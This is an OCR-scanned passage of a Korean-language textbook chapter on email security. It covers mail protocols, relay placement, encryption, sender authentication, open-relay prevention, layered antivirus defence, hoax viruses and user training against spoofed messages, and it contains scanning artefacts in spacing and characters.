규약，봉사기간통신，의뢰기들과 봉사기간통신 그리고 비본문요소(팍스화상，음성，비데오 
등) 첨 부능력 과 갈은 추가적 인 성 능들을 확정 하기 위한 끊임 없 는 세 부표준들의 필 요성 
을 인식하였 다. 

초판의 약점 과 결 함을 검 토처 리 하고 방대한 량의 조작성 능묶음과 서 로 구별 되 면서 도 
련관된 디렉터리표준을 첨부한 X.400 표준의 재판이 나왔는데 그것이 바로 X.500(LDAP 가 
기본적 으로 부분집 합)이 였다. 

보다 새 로운 ITU 표준이 널 리 전개 되 기 전에 인 터네 트는 이 른바 상업 화에 로 나갔으며 
를퓨터망으로서 이 미 있던 X.25 망들을 재빨리 따라 잡았다. 몇해동안 이 두 체 계는 관문 
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체계를 매개로 함께 리용되였다. 이상하게도 상대적으로 원시적이고 단순한 인터네트전 
자우편표준들은 고급하고 복잡한 X.400 표준이 보다 정교할뿐아니 라 통신에 TCP/IP 를 리 
용할수 있 었지만 그것 을 밀 어 내 였 다. 

현재 의 인 터네 트전 자우편표준들은 4 개 의 기본령역 을 포함한다. 

• SMTP(Simple Mail Transfer Protocol) RFC-821 에서 처음으로 규정되고 다른 
RFC 들에 서 확장된 이 규약은 전자우편봉사기 들사이 의 통보문전송방식 을 규정한 
다. 초기 에 는 전송흐름경 로조정 (仕 affic routing) 측면도 일부 규정 하였지 만 아래 에 
서술하는 DNS 의 기능들이 그것을 대신하였다. 의뢰기워크스테이션으로부터 통 
보문을 제출하는 사용자인증방법을 제공하는 ASMTP(Authenticated SMTP) 확장 
즉 RFC-2554 는 보안에서 특별히 중요하다. 

• < ARPA 인 터 네 트본문통보문형 식 표준〉 RFC-822 에 처 음으로 규정 되 고 다른 
RFC 들에서 확장 및 수정된 이 표준은 교환될 통보문의 형식 을 정의한다. 특별 
히 중요한것 은 비 본문정보를 포함하는 다구성통보문부호화표준방법 을 규정하는 
MIME (Multipurpose Internet Mail Extensions) 0 ] 다. 

• DNS(Domain Name System) DNS 의 초기 목적 은 인 터네 트 IP 주소를 콤퓨터 이 름과 
관련시키는데 있었다. 이 체계는 SMTP 전자우편경로조정에로 확장되였다. 현재 
인터네 트상에 서 전자우편경 로조정 의 두번째 확장판인 MX(Mail Exchanger) 레 코드 
가 사용중에 있다. 이 확장판들은 SMTP 에서 처음으로 정의된 경로조정을 대신 
한다. 

• S/MIME(Secure/MIME),PEM(Privacy Enhancement for Internet Electronic Mail). 

이 표준안들은 전자우편내용의 암호화 및 복호화，통보문통합보호，원본의 부인 
방지 등을 포함한 여 러 가지 암호화특징들을 참작한다. 

• 또한 다음 2개의 표준안들은 전자우편의뢰기 가 봉사기 로부터 우편을 복귀하도록 
하기 위하여 만든것 이 다. 

• IMAP(Interactive Mail Access Protocol) 이 규약은 전자우편의뢰기와 봉사기 
들사이 에서 의뢰기/봉사기호상작용을 위한 표준들을 정의한다. 이 것은 현재 
열린표준전자우편체계에 대한 사실상의 표준이지만 많은 전용전자우편봉사기 
체 계 들에 대 한 교차적 인 접 근방식 으로도 쓸모 있 다. IMAP 은 의 뢰 기 의 전 자우 
편통보문보관고상에 서 수정，삭제，봉사기 기반검 색，폴더 들사이 에 서 통보문들 
의 재 정 리，통보문상태 조종，공동폴더공유 등과 갈은 광범한 조종을 할수 있 
게 한다. 

• POP(post office protocol) 이 규약은 전자우편의뢰기 가 봉사기 로부터 머 리부 
또는 통보문을 검 색하는 방법，봉사기 로부터 통보문의 삭제 요청방법 들에 대 
한 표준을 정의한다. 이것은 아직도 널 리 리용되 고 있기 는 하지 만 아주 작은 
의뢰기 와 봉사기의 실현에 국한되 여 있으며 큰 체 계 들에서는 IMAP 에게 밀 려 
나고 있다. 

중요한것은 이 규약중 어느것도 배포해야 할 새로운 통보문제출방법을 제공하지 않 


209 



는다는것이다. 이 표준안들에 기초한 전자우편의뢰기는 새로운 통보문을 의뢰하는데 
SMTP 를 리용한다. 


목 적 


보안방책과 계획，기술，장치들이 그 기능을 심히 제한하지 않도록 하거나 보다 쉽게 
응용하는데 방해되지 않도륵 기본설계목적의 중요성을 고찰할 필요가 있다. 

명백히 전자우편의 목적은 사용자들사이의 통신을 보장하자는데 있는것만큼 그 응용 
에 있어서 사용의 편리성과 신뢰성이 중요한것이다. 전자우편응용프로그람은 그 시초부 
터 다음과 같은 세개의 기 본요소들을 포함하고 있었는데 그것들은 현재의 모든 전자우편 
응용프로그람에 서도 여 전히 찾아 볼수 있 다. 

• 표준형식 표준통보문형식은 임의의 사용자가 임의의 다른 사용자와 통보문을 교 
환할수 있게 한다. 

• 구성 모든 통보문들은 발신자 (from), 수신자 (to, 경우에 따라 cc 혹은 bcc), 제 출날 
자，기본내용과 갈은 마당들을 포함한다. 

• 보안 사용자들은 자기 우편만 읽을수 있으며 자기들이 만드는 통보문은 자기 구 
좌로부터의 발신으로 확인된다. 

현재 의 전자우편체 계 에 는 세 가지 기 본요소들이 여 러 가지 방법 으로 리용되 며 다음과 
같은 두가지 새로운 기초요소들만이 더 첨부되였다. 

• 운용호환성 개 별적콤퓨터체 계망들사이 의 통보문교환능력 

• 비본문정보전송 음성，비 데오，정 화상，자료기 지，표처 리 (spreadsheet), 실 행파일，스 
크립 트 등과 갈은 콤퓨터자료형 을 포함하거 나 첨 부하는 능력 

그러나 이 두가지 목적들은 자주 보안과 직접 충돌을 일으킨다. 

보안목적 목록으로부터 보면 다음과 같은 대 부분의 콤퓨터보안령역 과 관련된 일 반요 
소들이 있다. 

• 합법적사용자들만이 체계와 봉사에 접근할수 있도록 콤퓨터자원에로 접근조종을 
하는것 

• 자료의 류실 또는 파손의 방지 

• 자료 또는 봉사의 도난방지 

• 부적합한 자료보급의 방지 

• 규칙 또는 기관의 방책 에 따라 동작하는가에 대 한 감시 
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전자우편통신에서의 우 I 험과 문제점 


일반적으로 전자우편체 계는 인터네트상에서 한 기관의 사용자들이 다른 기관의 사용 
자들과 통신할수 있게 할것을 요구한다. 이것은 결국 인터네트와 그 기관의 전자우편봉 
사기들사이의 통신을 요구하지만 전자우편봉사기들과 인 터 네트사이의 직접적인 망접속은 
요구하지 않는다. 인 터 네 트로부터 특정 한 기 관의 전 자우편봉사기 들에 로의 망접 속을 제 한 
하기 위한 한가지 방안은 인터네트(또는 다른 불안전한 망)와 그 기관의 내부망사이에 
표준《 요새》망을 배 치 하는것 이 며 우편중계 장치 는 요새 망우에 설 치 되 여 야 한다는것 이 다 
(그림 13_1참고). 



그림 13-1. 인터네트로부터 전자우편봉사기들에 로의 망접속제 한 


외부방화벽은 전자우편중계체계 에 대한 일부 보호를 진행하는 한편 전자우편중계기 
와 외부봉사기들사이의 일부 통신을 허용한다. 해커들은 제공되는 전자우편통로를 통하 
여 공격을 시도할수 있는 기회를 얻는다. 

요새망에 중계 체 계 가 실 현됨 으로써 제 공되 는 보호는 다음과 같다. 

• 전자우편중계체계는 인터네트로부터 직접 공격 받을수 있는 유일한 체계이므로 
내부망우에 여러개의 전자우편봉사기가 있다고 하여도 침입검출부하는 그 체계 
에만 집 중된 다. 

• 중계체계를 뚫고 들어 온다 해도 거기에는 일시적인 통보문들만이 들어 있다. 

• 중계기에 대하여 가해 지는 봉사거부공격은 정상동작하는 기관내부의 전송흐름 
을 막지 못한다. 

일반적으로 공격자들은 단지 제한된 손상이나 주고 내부사용자와 외부사용자들사이 
의 봉사를 교란할수 있다. 해커는 중계봉사기를 완전히 손상시킬수 있는 능력을 가지려 
고 하며 또 내 부우편중계 기 들을 직 접 공격할수 있는 환경 으로서 그것 을 리용할수 있는 
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능력을 키우기 위 하여 시 간과 노력을 아끼지 않을것 이 다. 

일부 방화벽판매업체들은 단일방화벽안에서와 류사한 기능을 제공한다. 이 기능이 
실행되면 방화벽은 그자체가 전자우편중계기의 역할을 한다. 확고하지는 못하지만 기능 
적인 해결책은 요새 망의 내 부에 존재 하는 중계 기 체 계를 분리 하는것 인데 그것은 불안전 한 
망과 내부우편봉사기들사이의 직접적인 망통신보장에 아주 좋은 방법이다. 

많은 경 우에 인 터네 트상에 돌아 다니 는 전자우편통보문들은 제 3자의 감시 로부터 보 
호되 여 야 할 극히 신중한 정 보를 포함한다. 인 터네 트에 접 속할 때 유일 하게 준비 되 여 있 
는 해결책은 암호화이다. 그러나 전자우편암호화에 대한 여러 표준안들이 경쟁적으로 존 
재 하고 있지 만 어 느 표준안도 현재 광범히 채 용되 지 못하고 있 다. 정 보의 전체 량과 사 
용자의 분포에 의 존하여 암호화를 진행하는 여 러 가지 방법 이 있 다. 

최대의 보안은 매 사용자의 전자우편의뢰기쏘프트웨어 에서 제공하는 암호화기능을 
리용하는것 이 다. 그림 13 _2에 서 보는바와 같이 매 통보문들은 송신자의 체 계안에 서 암 
호화되며 수신자체계의 의뢰기쏘프트웨어 에 도달할 때 까지 암호화된채 로 남아 있게 된다. 


내부망 


요새 망 


불 안전한 망 



■봉나기 ᄂ 1 중계기' 1 ᄂ봉4자 


그림 13_2. 암호화 


그러나 이 방법과 관련하여 다음과 같은 많은 문제점들이 있다. 


• 암호화는 오직 송신자가 암호화특징을 리용하여야 하겠다는것을 생각하였을 때 
에만 진행될수 있다. 

• 각이 한 기 관의 사용자들이 같은 암호화체 계 ( S / MIME，PGP 등)를 리 용하는데 동 
의하여 야 한다. 

• 매 말단의 사용자와 의뢰기의 쏘프트웨어는 사용할 암호화열쇠 들에 대 한 정 보를 
교환할수 있어 야 한다. 


같은 기관 혹은 관련된 기관들이 지리적으로 떨어 져 있는 사무실들사이의 망접속을 
제 공하기 위한 목적 에 인 터네 트가 리용되 는 경 우에 도 암호화된 VPN 은 기 관내 부전송에 
필요한 보호를 제 공할수 있다. 그때 에 는 단순히 싸이트들사이 전자우편전송의 경 로조정 
을 VPN 을 통하여 진행하도록 할 필 요가 있 다. 





두 영 업동료들사이의 통신은 암호화에 의한 보호를 요구하지 만 어 떤 원인으로 VPN 
을 실행할수 없는 경우에는 우편암호화장치가 그림 13 — 3에 보여 준바와 같이 내부우편 
봉사기와 불안전망사이에 설 치될수 있다. 그 장치는 일 단 설 치되 면 특정하게 설정된 싸 
이 트들과 교환되 는 전송흐름에 대 하여서 는 암호화/복호화하도록 설정 되지만 그렇 지 않은 
싸이트들에 대 하여 서 는 암호화되 지 않은채 로 통과하도록 한다. 


내부망 ; 요새망 ; 불안전한 망 ; 요새망 ; 영업동료망 



그림 13-3. 우편암호화장치설치 


봉사기들사이 를 통과하는 통보문뿐아니 라 봉사기 들과 사용자워 크스테 이 션들사이 를 
통과하는 전송흐름의 보안도 고찰할 필 요가 있 다. 대 부분의 전자우편응용쏘프트체 계 는 
의뢰기와 봉사기쏘프트웨어사이 통신통로를 암호화할수 있는 능력을 가지고 있다. 암호 
화의 적 용은 봉사기 환경 에 서 부하를 상당히 증가시키 므로 일 반적 으로 기 정값은 미 사용 
( disabled ) 으로 한다. 일부 체계들은 다른 체계들이 SSL / TLS 와 같은 현존 암호화표준을 리 
용하는것 과는 달리 독자적 인 암호화체 계 를 리용한다. 

사용자들이 집 에서 혹은 려 행하면서 전자우편을 사용할 때 접속보안에 특별한 주의 
를 돌려야 한다. 일부 큰 기 관들은 경제 적 견지 에서 자체 의 안전원격접근체 계 를 내부망자 
원에 제 공할수 있지 만 원격사용자들의 접 속을 위 해서 는 더 욱더 인터네 트를 리 용하는 방 
향으로 나가고 있 다. 리용되 는 모든 접 근방법 들(전용방법， SMTP , POP , IMAP , Web 메 일 
등)은 이 암호화를 계획할 때 고려할 필요가 있다. 

원격사용자들은 봉사기에로 통신할 때 전자우편의뢰기를 암호화하는 대신 암호화가 
능원격접 근봉사기 를 리용할수 있 다(그림 13-4 참고). 



그림 13-4. 암호화가능한 원격접근봉사기 


이 장치들은 사용자들의 워 크스테 이션에 설 치된 쏘프트웨어 에 암호화된 런넬을 직 접 
형 성 하기 위하여 전문적 으로 사용된다. 원격워 크스테 이 션들에 VPN 런넬 을 형 성하는데 는 
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원격 접 근봉사기 들의 첨 부，의 뢰 기 워 크스테 이 션상에 VPN 쏘프트의 설 치 및 설 정， VPN 런넬 
설치에 사용되는 인증체계의 유지 등이 요구된다. 그러나 일단 설치되면 원격사용자들이 
임의의 내부망자원에 접근할수 있도륵 보다 많은 전자우편접속을 제공한다. 

인터네 트에서 전송흐름 (traffic) 의 교환에 리 용되 는 전자우편규약은 SMTP(Simple Mail 
Transfer Protocol) 라는것 이 다. 1982 년에 처음으로 개 발된 이 규약은 실행하기 가 특별히 쉬 
웠 으며 (그때 ) 단순한 인 터네 트(거 의 학술적 으로 리용)상에 서 사용될 것 을 목적 으로 하였 다. 
몇년동안 쓸모 있는 기본규약으로 많은 확장과 갱 신을 하였지만 초기설계의 유산은 많은 
보안문제 들을 산생 시켰 다. 

초기 에는 SMTP 통보문발신자의 인증을 결정할수 있는 어떠 한 구조도 가지 고 있지 
못하였다. 많은 체 계들에서 해 당한 통보문의 발신자마당에 는 사용자가 자기의뢰기쏘프트 
웨 어에 입력해 넣는것 이 들어 간다. 만일 사용자가 syn_kos@university.edu.kp 이 라고 입력 
하면 그것은 자기 의뢰기쏘프트웨어의 발신자마당에 들어 간다. 만일 의뢰기체 계 로부터 
통보문을 받는 봉사기가 발신자신원을 거절하지 않으면 그것은 중계 및 배포처리를 하는 
동안 임의의 다른 곳에서도 거부되지 않을것 이 다. 봉사기 쏘프트웨어는 다음과 같이 설정 
되여야 한다. 

• 국부사용자로부터 접속이 수립되는 동안 제출된 통보문의 발신주소가 인증된 신 
원과 맞는가를 요구하여 야 한다. 그러 나 유감스럽 게 도 대 부분의 열린체 계 들은 
기 정값이 그렇 게 설정되 여 있지 않으며 일 부는 그렇 게 하기 가 완전히 불가능하 
다. 독점체계들 (Microsoft Exchange, Lotus Notes Domino 등)은 전용제출방식 
(MAPI 등)을 사용할 때에는 사용자인증을 위하여 전형적 으로 정 확한 발신자전 
자우편주소를 요구하지 만 접 속에 열린 표준의 뢰 기 (SMTP/POP/IMAP) 들을 허 락할 
때에는 그렇게 하지 않는다. 

• 통보문의 발신자주소가 국부사용자를 나타낸다면 대화인증을 요구하여야 한다. 
그렇 게 하도록 주의 를 돌려 설 정하지 않으면 SMTP 를 통하여 통보문을 받는 대 
부분의 체 계 들은 이 검 사를 진 행하지 않는다. 

이 문제들에 대한 방도는 ASMTP(Authenticated SMTP) 를 사용하는것이며 일단 인증 
된 사용자는 자기 주소가 아닌 다른 발신주소를 가진 통보문을 제출하지 않도록 하는것 
이 다(한 사용자가 다른 주소를 가질 수 있 다고 가정 하는것 은 위 험하다.). 

미 리 이 야기할것 은 특정 IP 주소(대 표적 으로는 인증할수 없는 전자우편전송을 발생하 
는 응용프로그람봉사기)에 대해서는 ASMTP 요구를 무시할 필요가 있다는것이다. 이런 경 
우에 그런 전자우편전송을 시도하는 봉사기의 IP 주소는《인증》되여야 한다. 

ASMTP 는 기 관의 령 역안에 서 통보문의 모조를 막는데 사용할수 있지 만 외 부기 관으 
로부터 접수하는 통보문의 타당성검사에는 사용할수 없다. 일반적 으로 최선의 방도는 어 
떤 봉사기에로 통보문전송을 시도하는 봉사기의 IP 주소나 호스트이름이 그 통보문의 발 
신자주소의 령역에 《적합》하도록 하는것이다. 이렇게 하지 않고 기관들사이의 동의가 
없이 들어 오는 통보문의 타당성을 평가하려는 어떠한 시도도 억측에 불과하다. 

이 문제에 대하여 가장 쓸모 있는 하나의 해결책은 사용자들에게 이러한 정황을 가 



르쳐 주고 외부령역으로부터 들어 오는 모든 전자우편통보문들을 옳게 평가하는것이다. 
모든 내부전자우편이 인증을 요구한다고 해도 신용증(대표적으로 사용자이름/통과암호결 
합)들은 추측되거나 도난 당하거나 아니면 신용성이 떨어 진다(전자우편사용에서 사용자 
의 적합한 훈련은 이하의 여러 부분들에서도 취급된다.). 

《 열 린중계 기》라는 조건을 방지 하도록 해 당 우편봉사기 를 설정 하는것 이 또한 중 
요하다. 열린중계기의 기능을 수행하는 우편봉사기는 어떤 발신자주소를 가지는 통보 
문을 어떤 수신자주소에로 배포하기 위하여 받아 들일것이다. 인터네트의 력사적관점 
으로부터 고찰해 볼 때 열린중계기는 다른 기관의 통보문을 발송해 주는 훌륭한 우편 
배달부였다. 현대적시점에서 열 린중계기는《스패 머 ( spammer ) 들》의 동작을 허용하는 
믿을수 없는 나쁜 배달부로 볼수 있다. 검사를 하지 않은채로 계속 내버려 두면 해당 
기관의 우편봉사기들은 《검은 명단에 올려 지게》되고 다른 많은 기관들과 통신할 
수 없게 된 다(이 것 은 더 정 확하게 는 비 요청 전자우편다량배 포 ( UBE—Unsolicited Bulk E - 
mail ) 로 알려 져 있는데 이 장의 썩 뒤에 《 스팸 ( spam ) 》이 라는 내용에 서술되여 있 
다.). 

보안의 견지에서 다음과 같은 세가지 기본견해가 있다. 

• 스패머들은 허가나 보상도 없이 또는 간단히 《봉사를 훔쳐서》어떤 기관의 처 
리능력과 접속대역너비를 리용할수 있다. 

• 만일 이 런 사용을 검 사하지 않은채 로 방임하면 그 기 관의 전자우편체 계 와 대 역 
너비가 그 기관의 전자우편사용을 저하시키거나 전혀 사용불가능하도록 하는데 
악용될것이다. 

• 자기의 체계 가 전송흐름을 처 리하도록 허용하는것은 자기 기관의 영상을 떨어 
뜨리고 대외관계에 손상을 줄수 있다. 

• 자기 우편봉사기가 중계기로서 동작하던것을《종결》시키려면 다음과 갈은 두 
가지 기본조건에서만 전송흐름을 접수하도록 설정되여야 한다. 

• 통보문을 제출하려고 시도하는 어떤 다른 체계도 자기 체계의 사용자로서 정 
확히 인증이 되였으며 그 통보문의 발신주소는 인증된 신원 ( ID ) 과 일치한다 
(그러나 빈 우편주소 “< >” 는 수신 및 배포통지 등에 리용될 때 임의의 신 
원에도 유효하다.). 

• 통보문을 제출하려고 시도하는 체계는 사용자로서 인증되지 않고 발신주소는 
외 부령역 으로부터 오며 통보문의 모든 수신자는 기 관령 역내 부에 있 다. 

중계 능력 을 차단하기 위 하여 제 작자가 권고한대 로 전자우편체 계 를 설정할뿐아니 라 
권고된 설정이 실지로 중계를 차단하도록 설정된후에 봉사기의 중계상태를 검사하는것이 
중요하다(현재 권고안대로 설정했을 때 여전히 부분적으로 열리는 여러가지 중요전자우 
편중계기제품들이 상품화되고 있다. 중계차단에 필요한 설정에 대한 최신정보를 얻을수 
있 는 가장 좋은 방법 은 MAPS , ORBS , CAUCE 와 같은 여 러 스팸 대 응 ( anti - spam ) 회 사들로 
부터 쓸모 있는 직결봉사를 받는것이다.). 
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전자우편내용에서의 우 I 험과 문제점 


확실히 전자우편보안에서 가장 심각한 문제의 하나는 비루스의 전파일것이다. 전자 
우편이 광범히 보급되기 이전에 를퓨터비루스는 몇주，몇달 혹은 몇년에 한번씩 빈번히 
나타나 널리 만연되였다. 최근에는 많은 전자우편의뢰기들의 일정한 자동특성과 일부 비 
루스범죄자들에 의한 다소 교묘한《사회공학》의 덕택으로 여 러가지 최신비루스들이 하 
루가 멀다하게 널리 류포되였으며 대규모전자우편체계들을 순간에 무너뜨렸 다. 전자우편 
체계를 통한 비루스의 류포를 방지하는것은 명백히 매우 우선시할뿐아니라 주의를 돌려 
계획하고 수행할것을 요구한다(트로이목마와 같이 기술적으로 비루스가 아닌 다른 프로 
그람들과 스크립트들도 이 부류에 속한다.). 

전통적 으로 비 루스방지 는 모든 워 크스테 이 션에 항비 루스쏘프트웨 어 를 설 치 하는것 을 
통하여 진행되였다. 이것도 물론 여전히 중요하지만 그것만으로는 현재의 모든 형태의 
전자우편비 루스들을 다 방지 할수 없다. 특히 많은 전자우편의뢰기 쏘프트웨 어패 키지들은 
내부스크립트처 리 및 실행 환경 을 가지 고 있다 ( JavaStet，VBS 등). 여 러 종류의 비 루스들은 
전통적 인 항비루스쏘프트웨어의 개 입을 막는 방법으로 전자우편령 역내부의 바로 이 기능 
을 악용하였다. 그런 비루스의 첫째가는 큰 규모의 실례는 “ ILoveYou ” 비루스이다. 솜 
씨 있는 프로그람작성과 사회공학의 결합을 통하여 이 비루스는 전자우편의뢰기들이 국 
부사용자의 모든 주소목록의 입구에 자기의 복사본을 보내도록 시동하였다. 발생되는 전 
자우편의 용량은 봉사거부공격이 산생되는 수준에까지 이르러 간접적으로 많은 전자우편 
봉사기 들을 마비시 켰 다. 

전 자우편 비 루스들을 제 거 하기 위한 다른 하나의 전통적 인 방법 은 내 부전 자우편체 계 
와 인터네 트사이 에 비 루스검 사중계 기 를 배 치하는것이 였 다. 이 것은 비 루스공격 으로부터 
전자우편체 계 를 보호하기 위한 계 층화된 방어 에 서 여 전히 중요한 단계 로 되 는데 그것 은 
여 러 봉사기 전자우편의뢰기 에 받아 들이 기 쉽다. 대부분의 전자우편의 뢰기들 특히 열린 
표준들 (SMTP/IMAP/POP) 에 대하여 설계된 전자우편의뢰기들은 여러 봉사기상의 여러 구 
좌들이 호상작용할수 있게 설계된다. 사용자들은 자기의 의뢰기가 기관구좌와 하나 혹은 
그이상의 개 인구좌 (home ISP, 동우회，동창생 등)들과 다 호상작용하도록 이 특성을 자주 
리용한다. 의뢰기 는 원격봉사기들에 접근하는데 IMAP 혹은 POP 을 리용하기때 문에 항비 
루스기능을 가진 SMTP 중계기는 이 트랜잭션(仕 ansaction) 들을 보호할수 없다. 일단 비루스 
에 감염된 통보문이 사용자의 워크스테이션에 도달하면 그때에는 내부망안에서 자유롭게 
복제될수 있다. 

이 가능성을 피 하는데는 다음과 갈은 두가지 방법 이 있다. 

첫째 로, IMAP 와 POP 의 TCP 포구들을 차단하며 외부 전자우편봉사기 로부터 내부망의 
봉사기들을 보호하는데 방화벽을 설정할수 있다. 이것은 무릎형콤퓨터 나 다른 휴대형를 
퓨터장치 들로 하여 효과성 이 제 한된 다(사용자는 무릎형 콤퓨터 를 집 에 놓고 자기 의 ISP 접 
속을 통하여 보호되지 않은 우편봉사기들에 접근한다. 만일 비루스에 감염된 통보문을 
받았다면 후에 다시 무릎형콤퓨터를 사무실에 가져 가서 내부망에 접속하였을 때 비루스 
가 동작할수 있다.). 
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둘째로, 전자우편봉사기와 함께 직접 동작할수 있게 설계된 항비루스쏘프트웨어를 
모든 내부봉사기에 설치하는것이다. 이 쏘프트웨어는 통보문이 내부망에 도달하였다 하 
더라도 전자우편비루스의 류포를 방지하면서 제출되는 모든 통보문들을 주사한다(이 쏘 
프트웨 어 는 전자우편특정 비 루스만이 아니 라 모든 비 루스형 태 를 다 주사한다.). 

전자우편비루스의 류포속도와 관련하여 ( ILoveYou 비루스는 하루도 못되는 사이에 전 
세계에 류포되였으며 일부 전자우편봉사기들을 마비시키였다.) 새로운 항비루스정의와 
함께 거의 실시간적으로 그리고 좋기는 자동적으로 갱신될수 있는 항비루스프로그람을 
입수해 야 할 필요가 있다. 항비 루스해결책을 평 가하는데서 전자우편봉사기 들과 중계 기를 
을 위한 항비루스체계는 빨리 갱신될수 있게 하는것이 가장 중요하다. 가능하면 항비루 
스해 결 방안 판매 업 체 들이 봉사기 들에 새 로운 비 루스정 의 를 전송하여 자동적 으로 갱 신되 
는 봉사기 항비 루스해 결 방안을 선택하는것 이 좋다(주요 신판비 루스의 공격후에 즉시 판매 
업 체싸이트들로부터 갱 신판을 내 리적재하려 는것 은 문제 가 있을수 있 다.). 

비루스방지를 제공하는 가장 좋은 방법은 아래와 갈은 계층방식 이 다. 

• 워크스테 이션들은 항비루스체계를 설치하고 적합하게 갱신하여야 한다. 이 프로 
그람들은 일 부 전 자우편 특정비 루스들을 방지하지 못할수도 있 으나 다른 비 루스 
전파방법들로부터는 보호하며(휴대형매체, 공유된 보관소를 통한 전송 등) 주요 
형 태의 파손을 방지한다(디스크의 초기 화，파일삭제 등). 

• 내 부망안에 있는 전자우편봉사기 들은 원격전자우편구좌에 접 근하는 휴대 형 콤퓨 
터 및 의뢰기들로 인하여 내부망들에 들어 오는 비루스들로부터 이 봉사기들을 
보호하기 위하여 모든 전자우편통보문들(모든 첨부파일들 포함)을 주사하도록 
설계된 항비루스쏘프트웨어를 가지 고 있어 야 한다. 이 쏘프트웨어 는 거의 실시 
간적 으로 최 신비 루스정 의 들로 유지보존되 여 야 한다. 

• 내 부망과 인 터네 트(혹은 비신뢰 망)사이 에 전송흐름을 통과시키 는 전자우편중계 
기 들은 내 부체 계 들과 비신뢰외 부체 계 들사이 의 비 루스전염 을 조종하기 위한 항비 
루스체계들을 가지고 있어야 한다. 이 체계는 거의 실시간적으로 최신항비루스 
정 의 들로 유지 갱 신되 는것 이 아주 중요하다. 인 터네 트상의 비 루스전염《 폭풍》이 
일어 나는 곳들에서 이 체계는 내부전자우편봉사기들이 들어 오는 비루스감염된 
통보문들을 처 리 (거 절 또는 처 치 ) 하느라 쩔 쩔 매 는것 을 막을것 이 다(중계 기 체 계 는 
마비 되지만 기 관내부의 전자우편은 실시 가능한채 로 있다.). 

• 내 부사용자들이 사용하는 전자우편의 뢰기 쏘프트웨어 는 자률적 인 비 루스전염 을 
막게 끔 최 대 한의 보안설정 이 되 여 야 하며 판매 업 체 로부터 제 공되 는 유용한 최 신 
보안보강대책으로 유지되여야 한다. 많은 경우 설치시의 기정설정은 아주 불안 
전하다. 

• 전자우편사용자들은 여러 형태의 전자우편비루스들과 전자우편을 사용할 때 취 
하여야 할 예방조치들에 숙련되여야 한다. 이것은 트로이목마프로그람들의 전염 
을 막는데서 특별히 중요하다(알지 못하거나 믿을수 없는 원천들로부터 전자우 
편의 부착물을 절대로 열어 보지 말것. 알려 진 원천으로부터 오는 예견치 않은 
전자우편부착물을 의 심할것 . 의 심 스러 운 통보문을 받게 되 면 어 떤 방조를 받겠 
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는지 알고 있을것.) 


다른 하나의 비기술적인 형태의 비루스가 있는데 그것은 속임 ( hoax ) 비루스이다. 이 
비 루스들은 전형 적 으로 전자우편을 통하여 류포되 는 아주 새 로운 비 루스에 대 한 상세한 
내용으로 이루어 져 있다. 비루스에 대한 서술내용은 완전히 거짓일수 있는데 서술내용 
은 접수자가 공포에 빠지도록 아주 정교하게 만들어 지며 독자로 하여금 말을 퍼뜨리게 
끔 한다. 이 런 여 러 가지 속임비 루스 경 고문들은 아주 설득력 있 어 서 수많은 사용자들이 
수많은 수신자들에게 그 통보문을 전송하도록 한다. 결과적으로 전자우편체계는 이 통보 
문들의 용량으로 하여 과부하를 받게 되 며 매 우 유력한 봉사거 부공격 이 산생 된 다. 사용 
자들은 이 러한 정황에 대처할수 있는 다음과 갈은 방법들을 알고 있는것 이 중요하다. 

• 그러한 비 루스경 고들을 여 러 수신자들에게 전파시 키지 말라. 요컨대 위 험정도를 
평가할수 있는 기관내의 책임적인 당사자에게 단일복사본을 전송하도록 사용자 
들에게 알려 주라(만일 그것 이 진짜 위협으로 된다면 그사람 또는 기관은 그 통 
지 에 대 하여 자기 의 의 무를 리행하게 된 다.). 

• 사용자는 기관내의 특정주소에서 오는 진짜 비루스위협경고를 접수할 용의 가 있 
으며 그러한 통보문만을 신뢰한다. 

사용자는 비 루스에 감염 된 통보문과 비 루스경 고문처 리 뿐아니 라 전자우편의 여 러 가지 
측면에도 훈련되여야 한다. 앞에서 서술한 권고들은 위조전자우편(보통 spoofing ) 들을 막 
는데 도움이 되였다. 대표적인 사용자들은 보통 그것이 얼마나 간단히 전자우편을 위조 
할수 있는지 모른다. 사용자들은 자기가 접수하는 모든것에 대하여 맹목적으로 믿지 않 
도록 훈련되여야 한다. 만일 밖에서 어떤 방법으로 보통 습관과 절차에 따르는 전자우편 
을 받았다면 그 내용은 다른 통로를 통하여 확인할 필요가 있다. 사용자들이 전자우편의 
타당성을 맹목적으로 믿음으로 하여 일련의 문제가 생겼다. 일부 실제한 실례들은 깜짝 
놀랄 정도이 다. 

• 지 나친 장난이 동료에 의하여 저질러 졌다. 어느 한 종업 원은 자기 지배 인으로 
부터 《 당신은 해고되였소. 당신의 개인소지품들을 책상과 사무실에서 걷어 가 
지 고 저 녁 5시 까지 회 사밖으로 나가시 오.》라는 전자우편을 받는다. 또 다른 경 
우로는 한 종업원의 책임자인듯 한 사람으로부터 회사의 보안부서에 그 종업원 
이 사무실비 품들을 훔쳐 간다는 거 짓 전자우편 이 온다. 

• 불평 많은 종업원이 말썽을 일으킨다. 그는 재정담당부사장으로 가장하고 주문 
담당자에게 지불을 제대로 하지 않으므로 다시 통지가 있을 때까지 한 주요고객 
에게 보낼 주문품납입을 중지하라는 전자우편을 보낸다. 

• 정 직하지 못한 사람(기 관밖의)은 고위 판매 담당부사장이 보내 는것 처 럼 전자우편 
을 위 조한다. 그 전자우편은 앞으로 있게 될 무역전시 회 에 예 견된 고객 들에 게 
보여 줄 견본으로 될수 있게 100대의 제품견본을 다른 나라의 어떤 주소로 보낼 
것 을 지 시한다. 부주의 로 하여 보통의 문서 놀음에 따라 그 견본들은 즉시 발송 
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되게 된다. 

지배인이 전자우편을 통하여 실지로 종업원을 해고하겠는가. 이 지시나 주문들이 전 
자우편으로 정상적으로 통신되는가，사용자들은 어떤 문제들이 전자우편을 통하여 일상 
적으로 처리되며 언제 어떻게 그런 통보문들을 문의하거나 확인할것인가를 알려 줄것을 
요구한다. 만일 통보문의 접수자가 이런 형태의 통보문을 맹목적으로 받으면 비참한 결 
과를 초래할수 있다. 

전자우편통보문들은 거의 실시간적으로 이동하며 대부분의 전자우편체 계들은 보관 
및 기록능력을 극히 제한하므로 체계와 절차들은 계속 진보되고 조사될것을 요구한다. 
앞에서는 장난，파괴행위，절도 등의 불쾌한 행위들에 대한 실례를 들었다. 그외에도 전 
자우편을 통하여 진행되는 산업정탐，성희롱，위협，불법거래 등의 문제들이 있다. 

대부분의 주요회사들은 적극적인 준법활동을 벌려 사용자들로 하여금 정확히 행동하 
고 리용하도록 가르쳐 주고 있으나 그런 문제들은 아직 계속 조사되여야 한다. 독자는 
